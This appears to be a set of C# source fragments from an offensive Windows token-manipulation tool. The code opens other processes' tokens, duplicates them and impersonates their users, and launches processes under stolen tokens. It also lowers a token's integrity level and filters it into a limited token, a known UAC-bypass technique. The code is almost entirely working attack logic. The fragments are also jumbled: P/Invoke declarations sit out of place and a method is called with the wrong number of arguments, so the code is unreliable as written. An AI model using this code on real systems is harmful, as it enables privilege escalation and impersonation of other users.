////////////////////////////////////////////////////////////////////////////////
// Impersonates the token from a specified processId
////////////////////////////////////////////////////////////////////////////////
public virtual Boolean ImpersonateUser(Int32 processId)
{
Console.WriteLine("[*] Impersonating {0}", processId);
GetPrimaryToken((UInt32)processId, "");
if (hExistingToken == IntPtr.Zero)
{
return(false);
}
Structs._SECURITY_ATTRIBUTES securityAttributes = new Structs._SECURITY_ATTRIBUTES();
if (!advapi32.DuplicateTokenEx(
hExistingToken,
(UInt32)Enums.ACCESS_MASK.MAXIMUM_ALLOWED,
ref securityAttributes,
Enums._SECURITY_IMPERSONATION_LEVEL.SecurityImpersonation,
Enums.TOKEN_TYPE.TokenPrimary,
out phNewToken
))
{
GetError("DuplicateTokenEx: ");
return(false);
}
Console.WriteLine(" [+] Duplicate Token Handle: {0}", phNewToken.ToInt32());
if (!advapi32.ImpersonateLoggedOnUser(phNewToken))
{
GetError("ImpersonateLoggedOnUser: ");
return(false);
}
return(true);
}
public static extern Boolean DuplicateTokenEx(
IntPtr hExistingToken,
UInt32 dwDesiredAccess,
ref Structs._SECURITY_ATTRIBUTES lpTokenAttributes,
Enums._SECURITY_IMPERSONATION_LEVEL ImpersonationLevel,
Enums.TOKEN_TYPE TokenType,
out IntPtr phNewToken
);
public static extern Boolean CreateProcessAsUser(
IntPtr hToken,
IntPtr lpApplicationName,
IntPtr lpCommandLine,
ref Structs._SECURITY_ATTRIBUTES lpProcessAttributes,
ref Structs._SECURITY_ATTRIBUTES lpThreadAttributes,
Boolean bInheritHandles,
Enums.CREATION_FLAGS dwCreationFlags,
IntPtr lpEnvironment,
IntPtr lpCurrentDirectory,
ref Structs._STARTUPINFO lpStartupInfo,
out Structs._PROCESS_INFORMATION lpProcessInfo
);
////////////////////////////////////////////////////////////////////////////////
// Calls CreateProcessWithTokenW
////////////////////////////////////////////////////////////////////////////////
public Boolean StartProcessAsUser(Int32 processId, String newProcess)
{
GetPrimaryToken((UInt32)processId, "");
if (hExistingToken == IntPtr.Zero)
{
return(false);
}
Structs._SECURITY_ATTRIBUTES securityAttributes = new Structs._SECURITY_ATTRIBUTES();
if (!advapi32.DuplicateTokenEx(
hExistingToken,
(UInt32)Enums.ACCESS_MASK.MAXIMUM_ALLOWED,
ref securityAttributes,
Enums._SECURITY_IMPERSONATION_LEVEL.SecurityImpersonation,
Enums.TOKEN_TYPE.TokenPrimary,
out phNewToken
))
{
GetError("DuplicateTokenEx: ");
return(false);
}
Console.WriteLine(" [+] Duplicate Token Handle: " + phNewToken.ToInt32());
Create createProcess;
if (0 == Process.GetCurrentProcess().SessionId)
{
createProcess = CreateProcess.CreateProcessWithLogonW;
}
else
{
createProcess = CreateProcess.CreateProcessWithTokenW;
}
if (!createProcess(phNewToken, newProcess, ""))
{
return(false);
}
return(true);
}
////////////////////////////////////////////////////////////////////////////////
////////////////////////////////////////////////////////////////////////////////
public Boolean SetTokenInformation()
{
Structs.SidIdentifierAuthority pIdentifierAuthority = new Structs.SidIdentifierAuthority();
pIdentifierAuthority.Value = new byte[] { 0x0, 0x0, 0x0, 0x0, 0x0, 0x10 };
byte nSubAuthorityCount = 1;
IntPtr pSID = new IntPtr();
if (!advapi32.AllocateAndInitializeSid(ref pIdentifierAuthority, nSubAuthorityCount, 0x2000, 0, 0, 0, 0, 0, 0, 0, out pSID))
{
GetError("AllocateAndInitializeSid: ");
return(false);
}
Console.WriteLine(" [+] Initialized SID : {0}", pSID.ToInt32());
Structs.SID_AND_ATTRIBUTES sidAndAttributes = new Structs.SID_AND_ATTRIBUTES();
sidAndAttributes.Sid = pSID;
sidAndAttributes.Attributes = Constants.SE_GROUP_INTEGRITY_32;
Structs.TOKEN_MANDATORY_LABEL tokenMandatoryLabel = new Structs.TOKEN_MANDATORY_LABEL();
tokenMandatoryLabel.Label = sidAndAttributes;
Int32 tokenMandatoryLableSize = Marshal.SizeOf(tokenMandatoryLabel);
if (0 != ntdll.NtSetInformationToken(phNewToken, 25, ref tokenMandatoryLabel, tokenMandatoryLableSize))
{
GetError("NtSetInformationToken: ");
return(false);
}
Console.WriteLine(" [+] Set Token Information : {0}", phNewToken.ToInt32());
Structs._SECURITY_ATTRIBUTES securityAttributes = new Structs._SECURITY_ATTRIBUTES();
if (0 != ntdll.NtFilterToken(phNewToken, 4, IntPtr.Zero, IntPtr.Zero, IntPtr.Zero, ref luaToken))
{
GetError("NtFilterToken: ");
return(false);
}
Console.WriteLine(" [+] Set LUA Token Information : {0}", luaToken.ToInt32());
return(true);
}
////////////////////////////////////////////////////////////////////////////////
////////////////////////////////////////////////////////////////////////////////
public Boolean GetPrimaryToken(UInt32 processId)
{
//Originally Set to true
IntPtr hProcess = kernel32.OpenProcess(Constants.PROCESS_QUERY_LIMITED_INFORMATION, false, processId);
if (hProcess == IntPtr.Zero)
{
Console.WriteLine(" [-] Unable to Open Process Token: {0}", processId);
return(false);
}
Console.WriteLine("[+] Recieved Handle for: {0}", processId);
Console.WriteLine(" [+] Process Handle: {0}", hProcess.ToInt32());
if (!kernel32.OpenProcessToken(hProcess, (UInt32)Enums.ACCESS_MASK.MAXIMUM_ALLOWED, out hExistingToken))
{
Console.WriteLine(" [-] Unable to Open Process Token: {0}", hProcess.ToInt32());
return(false);
}
Console.WriteLine(" [+] Primary Token Handle: {0}", hExistingToken.ToInt32());
kernel32.CloseHandle(hProcess);
Structs._SECURITY_ATTRIBUTES securityAttributes = new Structs._SECURITY_ATTRIBUTES();
if (!advapi32.DuplicateTokenEx(
hExistingToken,
(UInt32)(Constants.TOKEN_ALL_ACCESS),
ref securityAttributes,
Enums._SECURITY_IMPERSONATION_LEVEL.SecurityImpersonation,
Enums.TOKEN_TYPE.TokenPrimary,
out phNewToken
))
{
GetError("DuplicateTokenEx: ");
return(false);
}
Console.WriteLine(" [+] Existing Token Handle: {0}", hExistingToken.ToInt32());
Console.WriteLine(" [+] New Token Handle: {0}", phNewToken.ToInt32());
kernel32.CloseHandle(hExistingToken);
return(true);
}
////////////////////////////////////////////////////////////////////////////////
////////////////////////////////////////////////////////////////////////////////
public Boolean ImpersonateUser()
{
Structs._SECURITY_ATTRIBUTES securityAttributes = new Structs._SECURITY_ATTRIBUTES();
if (!advapi32.DuplicateTokenEx(
luaToken,
(UInt32)(Constants.TOKEN_IMPERSONATE | Constants.TOKEN_QUERY),
ref securityAttributes,
Enums._SECURITY_IMPERSONATION_LEVEL.SecurityImpersonation,
Enums.TOKEN_TYPE.TokenImpersonation,
out phNewToken
))
{
GetError("DuplicateTokenEx: ");
return(false);
}
Console.WriteLine(" [+] Duplicate Token Handle : {0}", phNewToken.ToInt32());
if (!advapi32.ImpersonateLoggedOnUser(phNewToken))
{
GetError("ImpersonateLoggedOnUser: ");
return(false);
}
return(true);
}
